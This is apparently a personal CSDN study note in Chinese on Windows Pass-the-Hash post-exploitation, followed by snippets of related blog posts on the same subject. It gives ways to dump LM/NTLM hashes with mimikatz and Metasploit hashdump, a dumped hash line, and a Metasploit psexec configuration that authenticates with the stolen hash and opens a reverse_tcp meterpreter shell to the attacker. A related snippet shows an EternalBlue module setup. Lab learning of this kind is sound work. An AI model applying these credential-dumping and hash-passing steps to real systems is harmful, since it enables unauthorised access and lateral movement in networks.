个人简单笔记,后渗透学习之Passing the Hash(哈希传递

最新推荐文章于 2023-10-09 21:53:04 发布
最新推荐文章于 2023-10-09 21:53:04 发布
阅读量622 收藏 1
点赞数 1
分类专栏: 后渗透、内网学习 文章标签: passin the hash kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/104502446
版权

Passing the Hash

Hash基础知识
1.LM Hash,在早期的Windows操作系统中将明文密码转换为LM Hash保存在SAM文件中,因为LM Hash使用DES加密,密钥为硬编码,算法又存在缺陷,所以被废弃,为了保证系统兼容性可以自行开启。

2.NTLM Hash,在LM Hash算法被弃用时,NTLM Hash被用来进行Windows本地及远程身份验证的凭据,长度为32bit、由数字和字母组成。

Window系统下的Hash密码格式为:
用户名称:RID:LM-Hash值:NT-Hash值

获取Hash方法

1.使用卷影副本将SAM文件导出,配合SYSKEY利用mimikatz等工具获得NTLM Hash

2.使用mimikatz等工具读取lsass.exe进程,获取Hash

3.配合其他漏洞和手法获取net-NTLM Hash 4.net-NTLM Hash可以使用Responder或Inveigh等工具获取

MSF获取Hash值

我自己暂时所知道的三种方法

  • Hashdump
  • Run post/windows/gather/smart_hashdump
  • use post/windows/gather/hashdump

前提是要获得shell,获shell方法在前一篇文章有(点击我!)
在这里插入图片描述
获取hash:

ou:1000:aad3b435b51404eeaad3b435b51404ee:2b55f502918363eaaf713ba072e02e38:::

使用hash传递模块(passing the hash)

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > options

set rhost 192.168.179.132
set SMBUser ou
set SMBPass aad3b435b51404eeaad3b435b51404ee:2b55f502918363eaaf713ba072e02e38
set payload windows/meterpreter/reverse_tcpset LHOST kali的IP
Set LPORT 靶机获取shell的反弹监听端口,不然会失败,比如我这边都是1234

简单的通过不解密的哈希值获取一个session
在这里插入图片描述

努力的学渣'#
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1584
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
PassingTheHash
weixin_45007073的博客
01-24 193
前言 在我们获取到目标主机的权限时,我们一般都会想要进一步获取主机上的用户名和密码信息。因为密码无论是在Windows还是Linux上都是以hash值的形式进行保存的,因此我们可以用msf的模块对主机的密码进行一系列操作。 利用展示 使用hashdump对hash值进行下载,需要注意的是我们必须是超级管理员权限才能执行这个操作,一般的管理员不能执行这个操作 也可以使用后渗透模块集成的脚本,效果大同小异 另外一种则是比较厉害的一个脚本,smart_hashdump脚本。顾名思义,聪明的hashdu
Pass the hash tools
weixin_34061042的博客
10-04 96
http://oss.coresecurity.com/projects/pshtoolkit.htm www.foofus.net/~fizzgig/pwdump http://www.foofus.net/fizzgig/fgdump/ 转载于:https://blog.51cto.com/missuniverse110/400956
哈希传递:保护数据完整性和验证身份的关键技术
qq_45758325的博客
07-24 546
哈希传递:保护数据完整性和验证身份的关键技术
内网横传之哈希传递Pass The Hash
11-25 7233
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
PE-GAMP-master.zip_AwgnEstimin_GAMP_message passing_广义近似消息传递
07-13
Generalized approximage message passing with built-in parameter estimation论文代码
突破消息传递图神经网络的局限性_Breaking the Limits of Message Passing Graph Neu
02-08
突破消息传递图神经网络的局限性_Breaking the Limits of Message Passing Graph Neural Networks.pdf
LAMMPSPPT_lammp学习ppt_lammps_thecode_
10-03
**LAMMPSPPT_lammp学习ppt_lammps_thecode_** LAMMPS(Large-scale Atomic/Molecular Massively Parallel Simulator)是一款强大的分子动力学模拟软件,广泛应用于材料科学、化学、生物物理等领域。这份名为...
GNNNote学习笔记
09-17
在本篇GNNNote学习笔记中,我们将深入探讨图神经网络(Graph Neural Networks,简称GNN)的基础概念、实现原理以及在机器学习领域的应用。GNN作为一种强大的深度学习模型,已经在社交网络分析、推荐系统、化学分子...
Inside the Message Passing Interface 1st Edition
05-14
2018年新书,介绍了消息传递接口(Message Passing Interface,MPI)基础知识及最新版的开发和优化技巧。
哈希传递 (内网渗透
认真走好每一小步
07-25 333
哈希传递只有在相同密码的情况下有用!!!
内网渗透——哈希传递
最新发布
来日可期的博客
10-09 1183
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网渗透哈希传递
agrilly的博客
07-04 313
哈希算法、内网渗透、加密
内网横向移动之票据传递哈希传递
qq_52074678的博客
06-21 384
内网横向移动
渗透哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1923
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
kali密码攻击之——哈希传递攻击
The__Apollo的博客
04-22 7228
passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在计算机上的用户名和密码的hash值的时候,他虽然不知道密码值,但是仍然可以通过直接连接远程主机,通过传送密码的hash值来达到登录的目的。passing the hash套件
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1512
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
metasploit进阶
mingyqf的博客
02-28 851
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
Offensive Security MAC Control Bypass Notes PT.1.pdf
10-06
The author, Joas Antonio dos Santos, provides a comprehensive summary of the laboratory setup and the steps involved in bypassing MAC controls. The document delves into the technical details of MAC ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值